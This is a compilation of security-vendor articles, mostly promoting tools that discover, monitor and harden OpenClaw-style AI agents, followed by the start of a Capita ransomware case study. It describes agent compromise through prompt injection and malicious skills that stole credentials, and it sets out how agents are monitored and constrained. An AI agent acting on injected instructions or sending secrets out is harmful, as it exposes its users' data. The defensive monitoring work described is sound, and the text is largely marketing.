  • Treat skill/extension installation as introducing new code into a privileged environment: restrict registries, validate provenance, and monitor for rare or newly seen skills.
  • Log and periodically review agent memory/state and behavior for durable instruction changes, especially after ingesting untrusted content or shared feeds.
  • Plan for the event that you need to nuke‑and‑pave: keep non‑sensitive state snapshots handy, document a rebuild and credential‑rotation playbook, and rehearse it.
  • Run an up‑to‑date, real-time anti-malware solution that can detect information stealers and other malware.
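As a first, minimal self-audit along these lines, you can check whether an agent gateway is even listening on your machine. The sketch below probes TCP port 18789, which is reported as OpenClaw’s default listener; the port and the host list are assumptions to adjust for your own setup:

```python
# Quick self-audit sketch: check whether an OpenClaw-style gateway is listening
# on this machine. Port 18789 is reported as the default OpenClaw listener;
# the port and host list are assumptions to adjust for your own setup.
import socket

def port_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

if __name__ == "__main__":
    for host in ("127.0.0.1", socket.gethostname()):
        status = "OPEN" if port_open(host, 18789) else "closed"
        print(f"{host}:18789 is {status}")
```

An open port bound beyond localhost is a strong signal that the agent’s exposure should be reviewed against the sandboxing and egress recommendations above.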

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

OneClaw: Discovery and Observability for the Agentic Era

Autonomous agents and personal AI assistants are moving from experimentation to enterprise reality. Tools like OpenClaw (formerly Moltbot and Clawdbot), Nanobot and Picoclaw are being embedded across development environments, cloud workflows, and operational pipelines. They install quickly, evolve dynamically, and often operate with deep system-level access. For CISOs and security leaders, this presents a new governance challenge: How do you secure what you can’t see?

OneClaw, built by Prompt Security from SentinelOne®, was created to answer that question. It is a lightweight discovery and observability tool built to help secure AI usage by providing broad, organization-wide visibility into OpenClaw deployments without disrupting workflows or slowing down innovation. Where agent sprawl is accelerating faster than policy frameworks can adapt, OneClaw restores clarity, accountability, and executive oversight where it matters most.

Understanding The Risks Behind OpenClaw

While most security programs assume that AI applications and agents are vetted, IT sanctioned, registered, and monitored, OpenClaw agents can be:

  • Installed directly by developers
  • Extended through public skills and plugins
  • Granted persistent memory and tool access
  • Configured to run autonomously, and
  • Connected to external services and APIs.

They can also operate quietly in local environments, call tools automatically, schedule tasks via cron jobs, and access sensitive systems – all outside of most application inventory controls. Two main concerns emerge:

  • Shadow Agent Proliferation – How many OpenClaw instances are running across the enterprise?
  • Data Egress & External Exposure – Where are agents sending information, and to whom?

Without centralized observability, these risks persist. As assistants such as OpenClaw, Nanobot, and Picoclaw, along with other autonomous agents, continue to emerge, OneClaw is designed to eliminate the opacity around the risks they bring to businesses.

OpenClaw is only the beginning of a much larger shift toward autonomous agents and personal AI assistants embedded across the enterprise. In addition to OpenClaw, OneClaw already supports visibility coverage for emerging frameworks such as Nanobot and Picoclaw, extending the same discovery and observability capabilities across multiple agent ecosystems.

For CISOs, this future-proof approach is critical. Rather than deploying point solutions for each new tool that appears, OneClaw establishes a unified oversight layer for the entire category of new assistants, copilots, and autonomous workflows that continue to surface. The goal is not simply to manage one platform, but to provide lasting control over a rapidly expanding attack surface, ensuring that as agent adoption accelerates, security visibility and accountability keep pace.

Empowering Teams with Observability

OneClaw provides structured discovery and observability across OpenClaw deployments, leveraging a scanner that automatically detects supported CLIs and inspects the local .openclaw directory within user environments. It parses session logs, configuration files, and runtime artifacts to summarize meaningful usage patterns and surface critical operational details. OneClaw also captures browser activity performed by agents to deliver visibility into external interactions and potential data exposure paths.

From this data, OneClaw then summarizes active skills and installed plugins, recent tool and application usage, scheduled cron jobs, configured communication channels, available nodes and AI models, security configurations, and autonomous execution settings.

OneClaw outputs are structured in JSON format, making them flexible for integration into existing security ecosystems. Organizations can conduct local reviews, ingest the output into SIEM platforms, feed centralized monitoring systems, and correlate it with identity, endpoint, and cloud telemetry. For security leaders invested in unified visibility, this ensures that agent observability does not become siloed.
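Because the reports are JSON, routing them into review workflows is straightforward. The sketch below shows the general idea of triaging such a report before SIEM ingestion; the schema (field names like `autonomous_execution`, `skills`, `verified`) and the allow-list are invented for illustration and will not match OneClaw’s actual format:

```python
# Sketch of triaging a OneClaw-style JSON report before SIEM ingestion.
# The schema below (field names and values) is hypothetical, invented for
# illustration; adapt it to the actual report format.
import json

REPORT = '''{
  "host": "dev-laptop-42",
  "autonomous_execution": true,
  "skills": [
    {"name": "calendar-sync", "source": "clawhub", "verified": true},
    {"name": "crypto-helper", "source": "clawhub", "verified": false}
  ],
  "outbound_domains": ["api.example-llm.com", "unknown-tracker.example"]
}'''

APPROVED_DOMAINS = {"api.example-llm.com"}  # assumed internal allow-list

def triage(report: dict) -> list[str]:
    """Return human-readable findings worth escalating."""
    findings = []
    if report.get("autonomous_execution"):
        findings.append("autonomous execution enabled")
    for skill in report.get("skills", []):
        if not skill.get("verified"):
            findings.append(f"unverified skill: {skill['name']}")
    for domain in report.get("outbound_domains", []):
        if domain not in APPROVED_DOMAINS:
            findings.append(f"unreviewed outbound domain: {domain}")
    return findings

for finding in triage(json.loads(REPORT)):
    print(finding)
```

The same pattern scales to bulk ingestion: run the triage over every endpoint report and forward only the findings to the SIEM, keeping the raw JSON for forensics.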

For CISOs, this transforms AI agent behavior from invisible background activity into auditable telemetry that is integrated into broader enterprise security and risk management discussions.

From Raw Telemetry to Executive Intelligence

Though many tools generate logs, very few translate them into governance-ready insights. OneClaw provides a fully centralized dashboard that aggregates reports across all employees. Rather than just reviewing isolated endpoint-level findings, security leaders get visualized deployment trends, risk heatmaps, organization-wide exposure mapping, and skill usage distribution.

In a matter of minutes, the tool can be deployed via Jamf, Intune, Kandji or SentinelOne Remote Ops.

This elevates the conversation from technical detail to strategic oversight, which is critical as CISOs are now being asked for AI agent inventories, and whether the agents are operating within policy, can access sensitive systems, and are transmitting data externally.

With OneClaw, CISOs can gain visibility into:

  • How many OpenClaw agents are deployed enterprise-wide
  • What percentage is configured for autonomous execution
  • Which teams are installing high-risk skills
  • Where agents are making outbound connections
  • How agent adoption changes day to day

This level of structured visibility empowers security leaders to build the foundational layer for proactive governance for agentic AI security and have effective conversations about the short and long-term risks from OpenClaw adoption in their organization.

Security-Focused Behavioral Analysis

OneClaw does not assume all autonomy is dangerous. Instead, it surfaces where autonomy exists so that leaders can make informed, balanced policy decisions and strengthen controls with precision. For example, security teams may determine that autonomous execution is appropriate within a sandboxed development environment but requires approvals in production systems. They may allow specific, vetted skills while restricting newly installed public plugins pending review. They also may decide that outbound communication to approved internal APIs is acceptable, while flagging unknown external domains for investigation.

By making these conditions visible, OneClaw enables proportionate governance rather than blanket restrictions. Teams can confidently approve safe automation, enforce guardrails where needed, and document oversight for executive and regulatory reporting. The result is not reduced innovation, but safer acceleration where autonomous agents operate within clearly defined boundaries, and security leaders remain firmly in control of how and where that autonomy is trusted.

Transparency Without Disruption

OneClaw was designed to deliver visibility into autonomous activity without interrupting the work those agents (and the teams deploying them) are meant to accelerate. Rather than creating friction into development pipelines or altering how OpenClaw, Nanobot, or Picoclaw operate, it acts as an observability layer that security teams can deploy quietly across the environment.

The approach matters: Security leaders are not looking to slow down innovation, but they are accountable for what happens if agent behavior crosses policy boundaries or introduces risk. OneClaw gives the context needed for CISOs to act decisively using the cybersecurity controls they already trust. It does not replace prevention capabilities, it makes them smarter by ensuring autonomous activity is no longer invisible.

By surfacing where agents exist, how they are configured, and what they are interacting with, OneClaw allows organizations to distinguish between productive automation and risk behavior that warrants intervention. Security teams can then enforce standards through existing controls without imposing blanket restrictions that only frustrate developers.

The result? A model aligned with how modern security actually operates – observe first, contextualize risk, and then apply controls proportionately. OneClaw makes transparency a force multiplier for the security stack, and empowers CISOs to have confidence that autonomous innovation continues under watchful, informed oversight instead of blind trust.

Chaos to Clarity | Why This Matters Now

Agentic AI discovery is no longer optional. OpenClaw’s rapid growth and decentralized infrastructure are creating a large, and often unmanaged, attack surface. With skills frequently installed from public repositories and agents granted deep permissions, configuration drift occurs silently. Agent ecosystems can fall prey to exploitation through malicious skills and supply chain manipulation.

OneClaw supports how CISOs defend against OpenClaw-related risks by providing deep visibility and observability of agentic AI use and autonomous behavior, detecting risky configurations early on, and quantifying the exposures before incidents occur.

As adoption increases and autonomy deepens, OneClaw works to restore visibility while allowing powerful agents to accelerate development pipelines. CISOs have the clarity needed to govern autonomous systems responsibly, while getting structured discovery, centralized reporting, and security-focused analysis.

Start getting visibility into agent activity and security insights into OpenClaw deployments across your organization here. To learn more about securing your OpenClaw agents, register for our upcoming webinar happening Tuesday, March 3, 2026.

Join the Webinar
SentinelOne AI & Intelligence Leaders Discuss How to Secure OpenClaw Agents on March 3, 2026 at 10:00AM PST / 1:00PM EST

Shadow Agents: How SentinelOne Secures the AI Tools That Act Like Users

AI adoption is accelerating faster than security programs can adapt. Organizations are already experiencing breaches tied directly to unsanctioned AI usage, at significantly higher cost than traditional incidents, while the vast majority still lack meaningful governance controls to manage the risk. Traditional cybersecurity measures are necessary but insufficient. Securing AI requires purpose-built capabilities that span the entire AI lifecycle, from infrastructure to user interaction.

The rapid adoption of Large Language Models (LLMs) and Artificial Intelligence (AI) introduces transformative capabilities, but also novel and complex security challenges. Securing these sophisticated systems requires a multi-layered, end-to-end approach that extends beyond traditional cybersecurity measures. SentinelOne’s® Singularity™ Platform is uniquely positioned to provide holistic protection for LLM and AI environments, from the underlying infrastructure to the integrity of the models themselves and their interactions.

This document provides a detailed breakdown of how SentinelOne’s capabilities address the unique security requirements and emerging threats associated with LLMs and AI, now further enhanced by the integration of Prompt Security’s cutting-edge AI usage and agent security technology.

Because the most urgent question security leaders are asking right now is specifically about agentic AI assistants, tools like OpenClaw (aka Clawdbot and Moltbot) that can execute code and access data with user-level privileges, this document leads with dedicated coverage for those tools before mapping the full platform architecture.

Securing Agentic AI Assistants: OpenClaw Coverage

The Question Security Leaders Are Asking

“Do we have coverage for the new agentic AI assistants, such as OpenClaw (aka. Moltbot and Clawdbot) that are showing up across our environment?” Yes. SentinelOne provides multi-layered detection, hunting, and governance capabilities that specifically address these tools across three reinforcing control planes: EDR/XDR telemetry, AI interaction security (Prompt Security), and open-source agent hardening (ClawSec).

OpenClaw (aka Clawdbot and Moltbot) represents the next evolution of shadow AI risk. Unlike browser-based chatbots that operate within a web session, these agentic AI assistants can execute code, spawn shell processes, access local files and secrets, call external APIs, and operate with the same privileges as the user account running them. In SentinelOne’s SOC framework, they fall squarely into the highest-risk categories: agentic execution and compromise through the loop.

If an agentic assistant can read files, call tools, and talk out, it should be treated like a privileged automation account and secured accordingly.

Coverage Layer 1: EDR/XDR Detection & Threat Hunting

SentinelOne’s Singularity agent provides telemetry and tracking of OpenClaw (aka. Moltbot and Clawdbot). The Data Lake PowerQuery provided below adds detection of any activity at the endpoint level. Purpose-built hunting queries target these tools across four signal categories:

  • Process Execution: Clawdbot, OpenClaw, or Moltbot runtime processes launching on endpoints. Example indicators: command-line strings containing clawdbot, moltbot, or openclaw.
  • File Activity: creation, modification, or presence of agentic assistant files. Example indicators: file paths containing openclaw or clawdbot binaries and configurations.
  • Network Activity: communication on default agentic service ports and on domains associated with known-bad extensions. Example indicators: traffic on port 18789 (the default OpenClaw listener).
  • Persistence Mechanisms: scheduled tasks or services establishing agent persistence. Example indicators: scheduled tasks named OpenClaw or related service registrations.

Dedicated PowerQuery for Clawdbot / OpenClaw / Moltbot:

dataSource.name = 'SentinelOne' AND (
    (event.type = 'Process Creation' AND tgt.process.cmdline contains:anycase ('clawdbot','moltbot','openclaw')) OR
    (tgt.file.path contains 'openclaw' OR tgt.file.path contains 'clawdbot') OR
    (src.port.number = 18789 OR dst.port.number = 18789) OR
    (task.name contains 'OpenClaw')
)
| columns event.time, src.process.storyline.id, event.type, endpoint.name, src.process.user, tgt.process.cmdline, tgt.process.publisher, tgt.file.path, src.process.parent.name, src.process.parent.publisher, src.process.cmdline, src.ip.address, dst.ip.address

Beyond this targeted query, SentinelOne’s tiered SOC hunting framework provides behavioral detection that catches agentic assistants even when they are renamed, updated, or running through wrapper processes:

  • Tier 1 (Discovery): Identifies AI-capable runtimes and destinations across the environment, surfacing where agents like OpenClaw are executing.
  • Tier 3 (Behavioral): Detects the “agent-shaped” pattern, interpreter runtimes (Python, Node) spawning shell processes, touching secrets, and calling external APIs, which is the operational fingerprint of OpenClaw (aka Clawdbot and Moltbot) regardless of binary name.
  • Tier 4 (Impact): Correlates secrets access with non-standard egress within the same Storyline, identifying when an agentic assistant has moved from exploration to data exfiltration.

Storyline connects the entire chain of custody (i.e. what launched the agent, what it touched, and where it communicated) providing a defensible incident narrative for any agentic AI activity.

Coverage Layer 2: AI Interaction Security (Prompt Security)

The Prompt Security capabilities described in Pillar 7 of this document apply directly to OpenClaw (aka Clawdbot and Moltbot), but agentic assistants create risks that go beyond what standard AI chatbot monitoring addresses:

  • Agentic Shadow AI Discovery: Unlike browser-based AI tools that appear in web traffic logs, agentic assistants often run as local processes or connect through non-standard ports. Prompt Security identifies these tools regardless of how they connect, closing the visibility gap that network-based monitoring misses.
  • Execution-Aware Content Controls: Because agentic assistants can act on the instructions they receive (i.e. executing code, modifying files, calling APIs), Prompt Security’s content inspection takes on heightened importance. Sensitive data filtered at the interaction layer is prevented from ever entering an execution pipeline.
  • MCP Tool-Chain Governance: OpenClaw (aka Clawdbot and Moltbot) frequently interact with MCP tool servers to extend their capabilities. Prompt for agentic AI intercepts these calls, applying dynamic risk scoring before the agent can act on tool responses.

Coverage Layer 3: Agent Hardening (ClawSec)

ClawSec, an open-source security skill suite built by Prompt Security from SentinelOne, provides defense-in-depth specifically designed for OpenClaw agents:

  • Skill Integrity & Supply Chain Verification: Eliminates blind trust in downloaded skills by distributing security skills with checksums and verified sources. Drift detection flags when critical files have been silently modified.
  • Posture Hardening & Automated Audits: Scans for prompt-injection vectors, unsafe configurations, and runtime vulnerabilities within the agent environment. Automated daily audits generate human-readable security reports.
  • Community-Driven Threat Intelligence: Connects to a live security advisory feed powered by public vulnerability data (NVD) and community reports, making verified threat intelligence immediately available to subscribed agents.
  • Zero-Trust by Default: Blocks unauthorized egress and telemetry. If a threat is detected, the agent must explicitly request user consent before reporting externally, thereby eliminating hidden communication and background data sharing.
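The skill-integrity idea above (record a digest at install time, flag any later drift) can be sketched in a few lines. The file name and workflow below are illustrative only, not ClawSec’s actual verification mechanism:

```python
# Sketch of checksum-based skill integrity: pin a SHA-256 digest when a skill
# is installed, then detect silent modification ("drift") by re-verifying.
# The file name and workflow are illustrative, not ClawSec's actual format.
import hashlib
import tempfile
from pathlib import Path

def sha256_of(path: Path) -> str:
    """Hex SHA-256 digest of a file's contents."""
    return hashlib.sha256(path.read_bytes()).hexdigest()

def verify_skill(path: Path, expected_digest: str) -> bool:
    """True only if the file still matches its pinned digest exactly."""
    return sha256_of(path) == expected_digest

with tempfile.TemporaryDirectory() as tmp:
    skill = Path(tmp) / "demo_skill.md"
    skill.write_text("original skill contents\n")
    pinned = sha256_of(skill)            # digest recorded at install time
    print(verify_skill(skill, pinned))   # True: matches the pinned digest
    skill.write_text("tampered contents\n")
    print(verify_skill(skill, pinned))   # False: silent modification detected
```

Pinning digests only helps if they come from a trusted channel, which is why the suite pairs checksums with verified sources rather than trusting whatever ships alongside the skill.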

Integrated Coverage: How the Three Layers Work Together

  • EDR/XDR (Singularity Agent + Data Lake): endpoint-level process, file, network, and persistence detection. Key capability: behavioral detection via Storyline and a purpose-built PowerQuery for Clawdbot/OpenClaw/Moltbot.
  • AI Interaction Security (Prompt Security): the user-to-AI interaction layer. Key capability: real-time data leakage prevention, prompt injection blocking, and shadow AI discovery.
  • Agent Hardening (ClawSec): within the OpenClaw agent runtime. Key capability: skill integrity verification, posture hardening, and zero-trust egress control.

This three-layer approach ensures that whether an agentic AI assistant is discovered through EDR telemetry, flagged by Prompt Security’s interaction monitoring, or hardened proactively by ClawSec, security teams have full visibility and control over the risk these tools introduce.

At a Glance: Seven Security Pillars Mapped to Business Risk

The agentic AI coverage detailed above draws on all seven of SentinelOne’s core security pillars working together. The following table maps each pillar to the AI-specific threats it addresses and the business outcomes it protects, giving security leaders a rapid-reference guide for aligning platform capabilities to their organization’s AI risk priorities.

  • Cloud Native Security (CNS): exposed training data, misconfigured infrastructure, exploitable cloud paths. Outcome protected: prevents data breaches; reduces regulatory exposure.
  • Workload Protection: runtime compromise, container escapes, fileless attacks on AI hosts. Outcome protected: ensures AI service continuity; prevents operational disruption.
  • AI SIEM: multi-stage attacks, low-and-slow exfiltration, anomalous LLM usage. Outcome protected: enables detection of sophisticated threats; supports forensics and compliance.
  • Purple AI: evolving LLM attack techniques, slow investigation response times. Outcome protected: reduces MTTR; accelerates threat hunting without specialist expertise.
  • Automation & Response: fast-moving exfiltration, API key compromise, unauthorized data egress. Outcome protected: minimizes breach blast radius; contains incidents autonomously.
  • Secret Scanning & IaC: hardcoded credentials, pipeline vulnerabilities, insecure infrastructure definitions. Outcome protected: prevents supply chain compromise; secures pre-production environments.
  • AI Usage & Agent Security (Prompt Security): shadow AI, prompt injection, data leakage through AI interactions, jailbreaks. Outcome protected: protects IP and sensitive data; enables safe AI adoption at scale.

Recommended Next Steps for Security Leaders

This week: You can’t govern what you can’t see. Run the OpenClaw detection query in your Data Lake to determine whether agentic AI assistants are already active in your environment, assuming they are until proven otherwise. Audit browser extensions across high-risk teams. Review your AI acceptable use policy to confirm it addresses autonomous agents, not just chatbots. The goal is a baseline inventory of what AI tools exist, where they’re running, and who’s using them.

Within 90 days: Move from inventory to continuous visibility. A Prompt Security proof of value can get you there quickly, delivering real-time discovery of all AI tool usage across your environment, including the shadow AI activity your current stack can’t see. Use that visibility to establish sanctioned alternatives that give employees a secure path to the productivity they’re already chasing with unsanctioned tools. Operationalize behavioral detection hunts as automated detection rules so your SOC can identify new agentic activity as it appears, not months later.

Within 6 months: Mature from visibility into governance. Complete a full AI tool inventory with data classification and risk scoring. Establish enforcement policies that contain or block unsanctioned agentic tools at the endpoint, interaction, and network layers. Build board-ready reporting metrics that track AI-related risk posture over time. The organizations that move fastest here won’t be starting from scratch, they’ll be the ones that invested in visibility early enough to know what they’re governing.

Conclusion: From Visibility to Confidence

Securing LLMs and AI is not a future challenge, it’s a present imperative. SentinelOne’s Singularity Platform, now significantly enhanced by the capabilities of Prompt Security, provides end-to-end protection that spans cloud infrastructure, workload runtime, AI interaction governance, and automated response.

But the threat landscape is no longer just about chatbots and data leakage. The rapid adoption of agentic AI assistants like OpenClaw demonstrates that AI tools are evolving from passive information retrieval into autonomous agents that execute code, access secrets, and operate with real privileges on real systems. This shift demands a corresponding shift in security posture — from monitoring what employees type into a browser to governing what autonomous processes do on your endpoints.

SentinelOne’s three-layer coverage model addresses this directly. EDR/XDR telemetry provides behavioral detection at the endpoint. Prompt Security governs the interaction layer where sensitive data meets AI. And ClawSec hardens the agent runtime itself. Together, these layers give security teams the ability to discover, govern, and contain agentic AI tools without blocking the productivity gains they deliver.

The gap between organizations that believe they have AI governance and those that actually do is exactly where breaches happen. The organizations that close that gap won’t be those that adopted AI fastest or blocked it longest; they’ll be the ones that built the visibility, controls, and response capabilities to adopt it safely.

Security isn’t the department that says no to AI. It’s the function that makes AI possible at enterprise scale. To learn more about securing your OpenClaw agents, register for our upcoming webinar happening Tuesday, March 3, 2026.

Join the Webinar
SentinelOne AI & Intelligence Leaders Discuss How to Secure OpenClaw Agents on March 3, 2026 at 10:00AM PST / 1:00PM EST

ClawSec: Hardening OpenClaw Agents from the Inside Out

Autonomous agents are moving fast – from experimental side projects to real operational components inside development workflows and cloud environments. But while agent capabilities are accelerating, agent security has lagged behind. Most agent frameworks still assume implicit trust: trust in downloaded skills, in prompts that evolve over time, and in agents not to quietly exfiltrate data or drift into unsafe behavior.

That assumption has already been proven wrong. Over the last week, researchers uncovered more than 200 malicious OpenClaw skills published in a few short days, all masquerading as legitimate utilities while delivering credential-stealing malware. Distributed through GitHub and OpenClaw’s official registry, these skills harvested API keys, cloud secrets, wallet data, and SSH credentials, highlighting how easily agent supply chains can be weaponized at scale.

This activity did not emerge in isolation. OpenClaw’s rapid growth, decentralized skill ecosystem, and deep system-level access have created a large, largely unmanaged attack surface. Skills are often installed directly from public repositories, documentation is trusted at face value, and agents are granted persistent memory and tool access that rivals traditional applications without equivalent security controls.

Since the assumption of implicit trust no longer holds in today’s landscape, ClawSec was designed to close that gap. ClawSec is an open-source security skill suite created to harden OpenClaw agents against prompt injection, supply chain compromise, configuration drift, and unsafe runtime behavior. Purpose-built as a “skill-of-skills”, ClawSec wraps agents in a continuously verified security layer, validating what it runs, how it changes, and where the data is allowed to go. Now live on GitHub, ClawSec is a zero-cost, privacy-first solution protecting both humans and autonomous agents via a single install.

Why We Are Rethinking Agent Security

Traditional application security models don’t map cleanly onto agentic systems. As agents are dynamic by nature, they pull skills from external sources, modify their own prompts, call tools autonomously, and adapt their behavior over time. That flexibility is powerful, but it also creates new attack surfaces. Some of the most common failure modes include:

  • Blind trust in skills downloaded from public repositories
  • Prompt injection attacks that manipulate agent behavior at runtime
  • Silent configuration drift that weakens guardrails over time
  • Unauthorized egress where agents send data externally without user awareness

In many cases, these issues go undetected because there is no continuous verification layer watching the agent’s internals. ClawSec is designed to be that layer.

Introducing ClawSec

ClawSec is the first open-source security suite purpose-built for OpenClaw deployments. Rather than acting as a single defense mechanism, it functions as a composable security platform made up of modular skills that work in tandem.

Operating as a “skill-of-skills”, ClawSec forms a hardened shell around an agent. It doesn’t replace existing skills – it validates and protects them. Every security-relevant aspect of the agent is continuously checked, from supply chain integrity to runtime behavior and outbound communications.

ClawSec is a project by Prompt Security, a SentinelOne company, with its purpose rooted in security research, experimentation, and agentic workflow hardening. The goal here is not control, but resilience. By making agent security open, auditable, and driven by the community, ClawSec aims to set the highest bar possible for what “safe by default” means in today’s class of autonomous systems.

How It Works

ClawSec operates as a closed feedback loop in which individual detections strengthen the entire ecosystem over time.

  1. Install – Load the ClawSec suite as a single security skill.
  2. Activate – Integrity checks, posture hardening, and audits begin immediately.
  3. Detect – Suspicious behavior, drift, or known threats are flagged.
  4. Decide – The agent requests permission before reporting or communicating.
  5. Protect – Verified reports become community advisories that protect other agents.

Secure Skill Integrity & Supply Chain Defense

One of the most critical risks in agent-based ecosystems is skill supply chain compromise. Agents routinely download and execute skills written by third parties, often without any cryptographic verification or checks. With ClawSec, teams eliminate blind trust.

In ClawSec, every security skill is distributed with checksums and from verified sources only. The suite supports standard SKILL.md definitions as well as packaged .skill formats, ensuring compatibility with existing OpenClaw workflows.

Once installed, ClawSec continuously monitors critical files such as TOOLS.md, prompt baselines, and configuration manifests for signs of drift. If unexpected changes are found, the agent is alerted immediately. This approach treats skills the way modern security teams need to treat dependencies: verify first, trust second. ClawSec ensures that silent modifications are no longer invisible.
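The drift-monitoring pattern described above is straightforward to illustrate. The sketch below is not ClawSec’s actual implementation – just a minimal checksum-baseline approach in Python, where the watched file names come from the text and the helper names are hypothetical:

```python
import hashlib
from pathlib import Path

# Files named in the text; this list is illustrative, not ClawSec's real manifest.
WATCHED = ["TOOLS.md", "SKILL.md"]

def checksum(path: Path) -> str:
    """SHA-256 digest of a file's contents."""
    return hashlib.sha256(path.read_bytes()).hexdigest()

def build_baseline(root: Path) -> dict:
    """Record the current checksum of every watched file that exists."""
    return {name: checksum(root / name) for name in WATCHED if (root / name).exists()}

def detect_drift(root: Path, baseline: dict) -> list:
    """Return the names of watched files whose contents no longer match the baseline."""
    drifted = []
    for name, expected in baseline.items():
        p = root / name
        # A deleted file or a changed digest both count as drift.
        if not p.exists() or checksum(p) != expected:
            drifted.append(name)
    return drifted
```

A real implementation would also need to protect the baseline itself from tampering, for example by signing it or storing it outside the agent’s writable directories.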

Proactive Posture Hardening & Automated Audits

Security should not be reactive. ClawSec activates posture hardening as soon as it is installed: the agent’s configuration and runtime context are scanned immediately for known prompt-injection vectors, unsafe defaults, and misconfigurations.

For teams that want recurring automated audits, optional watchdog skills can be enabled to run daily, on startup, or after major changes. These audits generate human-readable reports that explain exactly what is being checked, what has changed, and what needs attention.

Community-Driven Threat Intelligence Without Centralization

Agent security evolves quickly, and no single team can track every emerging threat. ClawSec empowers teams by integrating a live, community-driven security advisory feed powered by the National Vulnerability Database (NVD) and reports submitted via GitHub Issues. When a threat is reviewed and verified by maintainers, it becomes an advisory that any subscribed ClawSec agent can consume.

With no centralized server, updates flow through GitHub workflows, making the system transparent, auditable, and resilient. As soon as a verified advisory is published, agents can react automatically: flagging risky skills, alerting users, and blocking execution paths tied to known issues.

Zero-Trust by Default

As a deliberate design choice, ClawSec takes a zero-trust stance on communication, enforcing silence as the baseline. Unauthorized egress and telemetry are blocked outright, so the agent does not phone home when an anomaly, threat, or compromise is detected. Instead, it pauses and asks for explicit user consent before any reporting or external communication.
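As an illustration (not ClawSec’s actual code), the silence-by-default model amounts to a default-deny egress gate in which the operator’s explicit approval is the only path out; every name below is hypothetical:

```python
def egress_gate(destination, payload, ask_user, send):
    """Default-deny outbound gate: nothing leaves unless the operator explicitly approves.

    ask_user: callback shown a human-readable prompt; returns True only on consent.
    send: the transport callback, invoked only after approval.
    """
    prompt = f"Agent requests to send {len(payload)} bytes to {destination}. Allow?"
    if not ask_user(prompt):
        return False  # blocked: silence is the baseline
    send(destination, payload)
    return True
```

The key property is that the transport callback is unreachable without consent, so even a compromised agent that tries to report out cannot exfiltrate silently.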

This model, with no hidden chatter, no background data sharing, and no surprise outbound requests, ensures that agents remain accountable to their operators – not to unseen infrastructure. Security events are handled transparently, with human experts at the core of the decision loop.

Conclusion | Build Secure. Share Secure.

While ClawSec ships with a strong set of core security capabilities, its real power lies in its extensibility. Developers are encouraged to contribute new security skills, including prompt defenses, policy-enforcement modules, auditing tools, and more. All submitted skills are reviewed, checksummed, and published to a shared catalog, so everyone can benefit.

What this creates is a shared security baseline for autonomous agents, defined and maintained by a community of experts rather than staying locked behind a vendor wall. We are excited to launch ClawSec to help organizations both build and share securely as we improve the security standard together.

Secure your OpenClaw Agents with ClawSec
Drift detection, security recommendations, automated audits, and skill integrity verification.

Third-Party Trademark Disclaimer:

All third-party product names, logos, and brands mentioned in this publication are the property of their respective owners and are for identification purposes only. Use of these names, logos, and brands does not imply affiliation, endorsement, sponsorship, or association with the third party.

Statistics Report on Malware Targeting Linux SSH Servers in Q4 2025

AhnLab SEcurity intelligence Center (ASEC) utilizes a honeypot to respond to and classify brute-force and dictionary attacks targeting poorly managed Linux SSH servers. This post covers the status of the attack sources identified in the logs from the fourth quarter of 2025 and the statistics of attacks launched by these sources. It also classifies the […]

Lessons from the BlackBasta Ransomware Attack on Capita

Introduction

When a company that manages data for millions of UK citizens falls victim to ransomware, the whole industry should pay attention. On 15 October 2025, the UK Information Commissioner’s Office (ICO) published a detailed 136-page report on the Capita breach.

The aim of this blog is to extract actionable cybersecurity lessons, from a cyber threat intelligence (CTI) analyst’s perspective, from the ICO’s findings and open-source reporting on the breach, to help SOC teams, CERT teams, and CISOs understand what happened and how to avoid repeating Capita’s mistakes.

BLUF Incident Impact Summary:

  • Capita was attacked by BlackBasta ransomware in March 2023
  • Over six million individuals’ records were exfiltrated from Capita’s systems
  • A £14 million fine was issued to Capita by the ICO
  • In May 2023, Capita said recovering from the incident would cost up to £20 million

Important context about Capita

The Capita Group is a business process outsourcing (BPO) and professional services group employing approximately 34,500 people worldwide and with a reported annual revenue of £2,421.6 million. For readers outside of Great Britain, Capita is best known as the UK’s go-to managed service provider for large-scale, data-sensitive public sector operations.

Companies within the Capita Group act as data processors for a range of business services to both public and private sector organisations. Capita plc is the ultimate parent company of a large corporate group consisting of multiple legal entities.

Capita has long been one of the UK government’s biggest suppliers of outsourced services.

They manage (or have managed):

  • The BBC TV Licensing system
  • The UK Congestion Charge for Transport for London (TfL)
  • The National Pupil Database, via contracts with the Department for Education
  • Electronic tagging of offenders, under contracts with the Ministry of Justice
  • Council administration and call-centre services for many local authorities (e.g., Birmingham, Southampton, Sheffield)
  • Numerous local government and private sector pension schemes (including universities, utilities, and insurance companies)
  • Ministry of Defence (MOD) training and support contracts for the British Army’s Recruitment Partnership Project (including vetting systems) and Royal Navy training programmes

The ICO established that during the Incident, data was exfiltrated from two legal entities which were acting as data controllers, and from four legal entities which were acting as data processors:

  • Capita plc - Capita plc’s focus includes Central Government, Local Public Service, Defence, Education, and Pensions. Capita was selected to administer the UK’s Civil Service Pension Scheme (CSPS) from September 2025, via a contract worth £239m over 10 years.
  • Capita Resourcing Limited - is a subsidiary of Capita plc focused on resourcing/human-capital services, i.e., recruitment, contingent staffing, talent acquisition.
  • Capita Business Services Limited - is another subsidiary that provides business-process and digital services (as a part of the Capita outsourcing ecosystem). The supplier record shows over £331.9m recorded government spending linked to this entity.
  • Capita Pension Solutions Ltd (CPSL) - a regulated pensions business within the Capita Group. Its role: delivering pensions administration and consulting services for pension schemes, including defined benefit schemes.

Breach Timeline

In the ICO’s report, a timeline of events that led to data exfiltration and ransomware deployment was provided. The timeline diagram below helps illustrate what happened.


The Record also reported that Capita’s share price dropped more than 12%, from a high of £38.64 ($47.97) on March 30, the day before the incident was first reported, to £33.72 ($42.58) on Wednesday morning.

On 3 April 2023, Capita released a public statement about the cyber incident. At the time, Capita said the “issue was limited to parts of the Capita network and there is no evidence of customer, supplier or colleague data having been compromised.” 

On 8 April 2023, Brett Callow spotted that Capita had been listed on BlackBasta’s Tor data leak site before it was quickly removed that same day.


Security researcher Kevin Beaumont, who analysed the leaked data samples at the time, identified copies of stolen passport scans, PII records, bank account details, and internal floor plans of multiple buildings, belonging to various schools as well as Capita Nuclear, part of Capita Business Services.

It took Capita until 20 April 2023 to confirm that some of its systems were in fact breached and that data had been stolen.

Types of Stolen Data

